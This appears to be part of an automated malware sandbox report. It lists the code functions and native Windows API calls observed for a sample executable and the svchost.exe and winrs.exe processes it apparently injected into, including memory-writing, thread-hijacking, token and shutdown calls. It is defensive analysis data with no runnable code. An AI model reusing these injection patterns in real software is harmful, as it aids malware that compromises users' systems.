Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D10 NtOpenProcessToken,	2_2_03473D10
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03554340 NtSetContextThread,LdrInitializeThunk,	4_2_03554340
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03554650 NtSuspendThread,LdrInitializeThunk,	4_2_03554650
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552B60 NtClose,LdrInitializeThunk,	4_2_03552B60
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_03552BF0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_03552BE0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_03552BA0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552AD0 NtReadFile,LdrInitializeThunk,	4_2_03552AD0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552AF0 NtWriteFile,LdrInitializeThunk,	4_2_03552AF0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552F30 NtCreateSection,LdrInitializeThunk,	4_2_03552F30
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552FE0 NtCreateFile,LdrInitializeThunk,	4_2_03552FE0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552FB0 NtResumeThread,LdrInitializeThunk,	4_2_03552FB0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_03552EE0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_03552E80
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_03552D10
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_03552D30
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552DD0 NtDelayExecution,LdrInitializeThunk,	4_2_03552DD0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_03552DF0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_03552C70
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552C60 NtCreateKey,LdrInitializeThunk,	4_2_03552C60
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_03552CA0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035535C0 NtCreateMutant,LdrInitializeThunk,	4_2_035535C0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035539B0 NtGetContextThread,LdrInitializeThunk,	4_2_035539B0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552B80 NtQueryInformationFile,	4_2_03552B80
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552AB0 NtWaitForSingleObject,	4_2_03552AB0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552F60 NtCreateProcessEx,	4_2_03552F60
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552F90 NtProtectVirtualMemory,	4_2_03552F90
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552FA0 NtQuerySection,	4_2_03552FA0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552E30 NtWriteVirtualMemory,	4_2_03552E30
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552EA0 NtAdjustPrivilegesToken,	4_2_03552EA0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552D00 NtSetInformationFile,	4_2_03552D00
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552DB0 NtEnumerateKey,	4_2_03552DB0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552C00 NtQueryInformationProcess,	4_2_03552C00
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552CC0 NtQueryVirtualMemory,	4_2_03552CC0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03552CF0 NtOpenProcess,	4_2_03552CF0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03553010 NtOpenDirectoryObject,	4_2_03553010
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03553090 NtSetValueKey,	4_2_03553090
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03553D70 NtOpenThread,	4_2_03553D70
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03553D10 NtOpenProcessToken,	4_2_03553D10
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C68EE0 NtCreateFile,	4_2_02C68EE0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C69340 NtAllocateVirtualMemory,	4_2_02C69340
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C69050 NtReadFile,	4_2_02C69050
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C691E0 NtClose,	4_2_02C691E0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C69140 NtDeleteFile,	4_2_02C69140
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327FBCD NtResumeThread,	4_2_0327FBCD
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327F969 NtMapViewOfSection,	4_2_0327F969
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0327F94E NtMapViewOfSection,	4_2_0327F94E

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01026713: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_01026713

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0101ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0101ACC5

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_010279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_010279D3

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0100B043	0_2_0100B043
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0101410F	0_2_0101410F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0101038E	0_2_0101038E
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FEE3B0	0_2_00FEE3B0
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010002A4	0_2_010002A4
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0101467F	0_2_0101467F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010006D9	0_2_010006D9
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01014BEF	0_2_01014BEF
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0104AACE	0_2_0104AACE
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0100CCC1	0_2_0100CCC1
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FEAF50	0_2_00FEAF50
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FE6F07	0_2_00FE6F07
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010431BC	0_2_010431BC
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0100D1B9	0_2_0100D1B9
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FFB11F	0_2_00FFB11F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010213CA	0_2_010213CA
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FF3200	0_2_00FF3200
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FE93F0	0_2_00FE93F0
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0100123A	0_2_0100123A
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0101724D	0_2_0101724D
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FFF563	0_2_00FFF563
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FE96C0	0_2_00FE96C0
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0104F7FF	0_2_0104F7FF
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FE77B0	0_2_00FE77B0
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0102B6CC	0_2_0102B6CC
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010179C9	0_2_010179C9
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FFFA57	0_2_00FFFA57
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FF3B70	0_2_00FF3B70
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FE9B60	0_2_00FE9B60
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FE7D19	0_2_00FE7D19
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FFFE6F	0_2_00FFFE6F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00FE7FA3	0_2_00FE7FA3
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01009ED0	0_2_01009ED0
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00A86FF0	0_2_00A86FF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004183B3	2_2_004183B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401250	2_2_00401250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EA03	2_2_0042EA03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004042CC	2_2_004042CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004023F9	2_2_004023F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402400	2_2_00402400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FC2A	2_2_0040FC2A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FC33	2_2_0040FC33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004165B0	2_2_004165B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004165B3	2_2_004165B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE53	2_2_0040FE53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DE33	2_2_0040DE33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF79	2_2_0040DF79
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF83	2_2_0040DF83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035003E6	2_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C02C0	2_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430100	2_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F81CC	2_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F41A2	2_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035001AA	2_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464750	2_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C6E0	2_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03500591	2_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F2446	2_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4420	2_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EE4F6	2_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F6BD7	2_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350A9A6	2_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344A840	2_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E8F0	2_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034268B8	2_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03482F28	2_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460F30	2_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E2F30	2_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432FC8	2_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344CFE0	2_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BEFA0	2_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440E59	2_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEE26	2_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEEDB	2_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452E90	2_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FCE93	2_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344AD00	2_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DCD1F	2_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343ADE0	2_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03458DBF	2_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440C00	2_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430CF2	2_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0CB5	2_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342D34C	2_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F132D	2_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0348739A	2_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B2C0	2_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E12ED	2_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034452A0	2_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347516C	2_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342F172	2_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350B16B	2_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344B1B0	2_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EF0CC	2_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034470C0	2_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F70E9	2_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF0E0	2_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF7B0	2_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485630	2_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F16CC	2_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7571	2_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035095C3	2_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DD5B0	2_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03431460	2_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF43F	2_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFB76	2_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B5BF0	2_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347DBF9	2_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FB80	2_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFA49	2_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7A46	2_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B3A6C	2_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EDAC6	2_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DDAAC	2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485AA0	2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E1AA3	2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449950	2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B950	2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D5910	2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AD800	2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034438E0	2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFF09	2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD2	2_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD5	2_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03441F92	2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFFB1	2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449EB0	2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03443D40	2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F1D5A	2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7D73	2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FDC0	2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B9C32	2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFCF2	2_2_034FFCF2
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DA352	4_2_035DA352
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0352E3F0	4_2_0352E3F0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035E03E6	4_2_035E03E6
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035C0274	4_2_035C0274
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035A02C0	4_2_035A02C0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035A8158	4_2_035A8158
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035BA118	4_2_035BA118
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03510100	4_2_03510100
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D81CC	4_2_035D81CC
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035E01AA	4_2_035E01AA
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D41A2	4_2_035D41A2
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035B2000	4_2_035B2000
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03544750	4_2_03544750
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03520770	4_2_03520770
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0351C7C0	4_2_0351C7C0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0353C6E0	4_2_0353C6E0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03520535	4_2_03520535
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035E0591	4_2_035E0591
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D2446	4_2_035D2446
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035C4420	4_2_035C4420
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035CE4F6	4_2_035CE4F6
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DAB40	4_2_035DAB40
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D6BD7	4_2_035D6BD7
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0351EA80	4_2_0351EA80
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03536962	4_2_03536962
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035229A0	4_2_035229A0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035EA9A6	4_2_035EA9A6
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03522840	4_2_03522840
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0352A840	4_2_0352A840
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0354E8F0	4_2_0354E8F0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035068B8	4_2_035068B8
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03594F40	4_2_03594F40
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03540F30	4_2_03540F30
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035C2F30	4_2_035C2F30
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03562F28	4_2_03562F28
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03512FC8	4_2_03512FC8
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0352CFE0	4_2_0352CFE0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0359EFA0	4_2_0359EFA0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03520E59	4_2_03520E59
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DEE26	4_2_035DEE26
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DEEDB	4_2_035DEEDB
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03532E90	4_2_03532E90
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DCE93	4_2_035DCE93
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035BCD1F	4_2_035BCD1F
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0352AD00	4_2_0352AD00
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0351ADE0	4_2_0351ADE0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03538DBF	4_2_03538DBF
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03520C00	4_2_03520C00
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03510CF2	4_2_03510CF2
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035C0CB5	4_2_035C0CB5
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0350D34C	4_2_0350D34C
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D132D	4_2_035D132D
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0356739A	4_2_0356739A
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0353B2C0	4_2_0353B2C0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035C12ED	4_2_035C12ED
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035252A0	4_2_035252A0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0350F172	4_2_0350F172
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035EB16B	4_2_035EB16B
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0355516C	4_2_0355516C
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0352B1B0	4_2_0352B1B0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035CF0CC	4_2_035CF0CC
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035270C0	4_2_035270C0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D70E9	4_2_035D70E9
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DF0E0	4_2_035DF0E0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DF7B0	4_2_035DF7B0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03565630	4_2_03565630
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D16CC	4_2_035D16CC
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D7571	4_2_035D7571
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035E95C3	4_2_035E95C3
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035BD5B0	4_2_035BD5B0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03511460	4_2_03511460
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DF43F	4_2_035DF43F
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DFB76	4_2_035DFB76
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03595BF0	4_2_03595BF0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0355DBF9	4_2_0355DBF9
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0353FB80	4_2_0353FB80
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035DFA49	4_2_035DFA49
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035D7A46	4_2_035D7A46
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03593A6C	4_2_03593A6C
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035CDAC6	4_2_035CDAC6
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03565AA0	4_2_03565AA0
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035BDAAC	4_2_035BDAAC
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035C1AA3	4_2_035C1AA3
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_03529950	4_2_03529950
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0353B950	4_2_0353B950
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_035B5910	4_2_035B5910
Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_0358D800	4_2_0358D800
